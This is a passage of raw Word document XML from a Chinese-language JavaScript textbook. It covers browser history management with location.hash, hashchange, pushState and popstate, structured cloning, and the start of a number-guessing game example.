        <w:t>latitude"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pos.coords.latitude+"longitude"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pos.coords.longitude+".";//</w:t>
      </w:r>
      <w:r>
        <w:t>如果设备还返回了海拔信息，则将其添加进去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(pos.coords.altitude){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>msg+="You are"+pos.coords.altitude+"±"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pos.coords.altitudeAccuracy+"meters above sea level.";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果设备还返回了速度和航向信息，也将它们添加进去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(pos.coords.s</w:t>
      </w:r>
      <w:r>
        <w:t>peed){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>msg+="You are travelling at"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pos.coords.speed+"m/s on heading"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pos.coords.heading+".";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.innerHTML=msg;//</w:t>
      </w:r>
      <w:r>
        <w:t>显示所有的位置信息</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50" w:name="22_2_Li_Shi_Ji_Lu_Guan_Li_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　历史记录管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="550"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器会记录在一个窗口中载入的所有文档，同时提供了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，允许用户在这些文档之间切换浏览。这种浏览器历史记录模型最早在</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>文档都是被动的，所有的计算都在服务器上完成</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>那个时期就已经存在了。如今，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应</w:t>
      </w:r>
      <w:r>
        <w:t>用通常都是动态地生成或载入页面内容，并在无须刷新页面的情况下就显示新的应用状态。如果想要提供用户能够通过浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，直观地切换应用状态，像这类应用就必须自己处理应用的历史记录管理。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了两种用于历史记录管理的机制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其中比较简单的历史记录管理技术就是利用</w:t>
      </w:r>
      <w:r>
        <w:t>location.hash</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>hashchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。截至撰写本书时，这种技术一直也是比较广泛实现的：浏览器甚至在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前就已经开始实现该技术了。在绝大多数浏览器中（</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>早期版本除外），设置</w:t>
      </w:r>
      <w:r>
        <w:t>location.hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性会更新显示在地址栏中的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，同时会在浏览器的历史记录中添加一条记录。</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的片段标识符，通常是用于指定要滚动到的文档中某一部分的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>。但是</w:t>
      </w:r>
      <w:r>
        <w:t>location.hash</w:t>
      </w:r>
      <w:r>
        <w:t>不一定非要设置为一个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>：它可以设置成任何的字符串。如果能够将应用状态编码成一个字符串，就可以使用该字符串作为片段标识符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>设置了</w:t>
      </w:r>
      <w:r>
        <w:t>location.hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性后，接下来要实现允许用户通过</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮来切换不同的文档状态。这个时候，应用必须要想办法检测状态变化，以便它能够读取出存储在片段标识符中的状态并相应地</w:t>
      </w:r>
      <w:r>
        <w:t>更新自己的状态。支持</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器一旦发现片段标识符发生了改变，就会在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>hashchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这样，在支持</w:t>
      </w:r>
      <w:r>
        <w:t>hashchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件的浏览器中，就可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>window.onhashchange</w:t>
      </w:r>
      <w:r>
        <w:t>为一个处理程序函数，使得每次由于切换历史记录导致片段标识符变化的时候，都会调用该处理程序函数。当调用该处理程序函数的时候，就可以对</w:t>
      </w:r>
      <w:r>
        <w:t>location.hash</w:t>
      </w:r>
      <w:r>
        <w:t>的值进行解析，然后使用该值包含的状态信息来重新显示应用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了一个相对更加复杂和强健的历史记录管理方法，该方法包含</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>istory.pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件。当一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用进入一个新的状态的时候，它会调用</w:t>
      </w:r>
      <w:r>
        <w:t>history.pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将该状态添加到浏览器的浏览历史记录中。该方法的第一个参数是一个对象，该对象包含用于恢复当前文档状态所需的所有信息。该对象可以是任何能够通过</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>方法转换成相应字符串形式的对象，也可以是其他类似</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>这样特定的本地类型（参见下面的补充内容）。该方法的第二个可选参数是一个可选的标题（普通的文本字符串），浏览器可以使用它</w:t>
      </w:r>
      <w:r>
        <w:t>（比如，在一个</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>Back</w:t>
      </w:r>
      <w:r>
        <w:t>＞菜单中）来标识浏览历史记录中保存的状态。该方法的第三个参数是一个可选的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，表示当前状态的位置。相对的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>都是以文档的当前位置为参照，通常该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>只是简单地指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>（诸如</w:t>
      </w:r>
      <w:r>
        <w:t>#state</w:t>
      </w:r>
      <w:r>
        <w:t>）这样的</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>（或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>片段标识符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）部分。将一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>和状态关联，可以允许用户将应用的内部状态作为书签添加到浏览器中，并当在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中包含足够信息的时候，应用可以在从书签中载入的时候就恢复它的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正如上面所提到的，</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受一个状态对象并为该对象创建一份私有副本</w:t>
      </w:r>
      <w:r>
        <w:t>。这是对一个对象进行深拷贝或者深复制：它会递归地复制所有嵌套对象或者数组的内容。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准将这类复制称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>structured clone</w:t>
      </w:r>
      <w:r>
        <w:t>）。创建一个结构性复制的过程就好比是将一个对象传递给</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，然后再将结果字符串传递给</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节）。但是</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>只支持</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的基础类型和对象以及数组。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准中提到，结构性复制算法必须还能够复制</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象、</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象（来自＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
      <w:r>
        <w:t>：参见</w:t>
      </w:r>
      <w:r>
        <w:t>21.4.14</w:t>
      </w:r>
      <w:r>
        <w:t>节）、</w:t>
      </w:r>
      <w:r>
        <w:t>FileList</w:t>
      </w:r>
      <w:r>
        <w:t>对象、</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象以及</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>对象（在</w:t>
      </w:r>
      <w:r>
        <w:t>22.6</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍）。但是在结构性复制算法中会显式排除</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数和错误以及绝大部分诸如窗口、文档、元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素等这类宿主对象。或许还不会存储文件或者图片数据作为历史状态的一部分，但是结构性复制还被其他一些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>相关的标准用到，在本章其他地方，还会对其做相应的介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法之外，</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了</w:t>
      </w:r>
      <w:r>
        <w:t>replaceState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，该方法和</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受同样的参数，但是不同的是，它不是将新的状态添加到浏览历史记录中，而是用新的状态代替当前的历史状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用户通过</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮浏览保存的历史状态时，浏览器会在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件。与该事件相关联的事件对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:t>属性，该属性包含传递给</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的状态对象的副本（另一个结构性复制）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-3</w:t>
      </w:r>
      <w:r>
        <w:t>是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>22-1</w:t>
      </w:r>
      <w:r>
        <w:t>所示的一个猜数字的游戏</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它使用这些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>技术来保存应用记录，允许用户通过</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来回顾或者撤销对数字的猜测。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251741184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4019909" cy="1712343"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="82" name="00082.jpeg" descr="000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2.jpeg" descr="00082.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4019909" cy="1712343"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>22-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一个猜数字游戏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本书出版时，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>对历史记录</w:t>
      </w:r>
      <w:r>
        <w:t>AP</w:t>
      </w:r>
      <w:r>
        <w:t>做了两点修改，其他的浏览器可能也会跟着进行这两点修改。第一，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>使得</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象自身可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:t>属性获取当前状态，这就意味着新载入的页面无须等待一个</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件。第二，对于没有任何保存状态的新载入的页面，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>不再出发</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件。第二点修改意味着</w:t>
      </w:r>
      <w:r>
        <w:t>下面这个例子在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>将无法工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-3</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法进行历史记录管理</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r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>I'm thinking of a number...</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=newgame;//</w:t>
      </w:r>
      <w:r>
        <w:t>页面载入的时候就开始一个新的游戏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onpopstate=popState;//</w:t>
      </w:r>
      <w:r>
        <w:t>处理历史记录相关事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var state,ui;//</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量，在</w:t>
      </w:r>
      <w:r>
        <w:t>newgame()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中会对其初始化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>unction newgame(playagain){//</w:t>
      </w:r>
      <w:r>
        <w:t>开始一个新的猜数字游戏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化一个包含需要的文档元素的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>heading:null,//</w:t>
      </w:r>
      <w:r>
        <w:t>文档最上面的＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>prompt:null,//</w:t>
      </w:r>
      <w:r>
        <w:t>要求用户输入一个猜测数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input:null,//</w:t>
      </w:r>
      <w:r>
        <w:t>用户输入猜测数字的地方</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>low:null,//</w:t>
      </w:r>
      <w:r>
        <w:t>可视化的三个表格单元格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mid:null,//</w:t>
      </w:r>
      <w:r>
        <w:t>猜测的数字范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>high:null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>查询这些元素中每个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var id in </w:t>
      </w:r>
      <w:r>
        <w:t>ui)ui[id]=document.getElementById(id);//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>字段定义一个事件处理程序函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.input.onchange=handleGuess;//</w:t>
      </w:r>
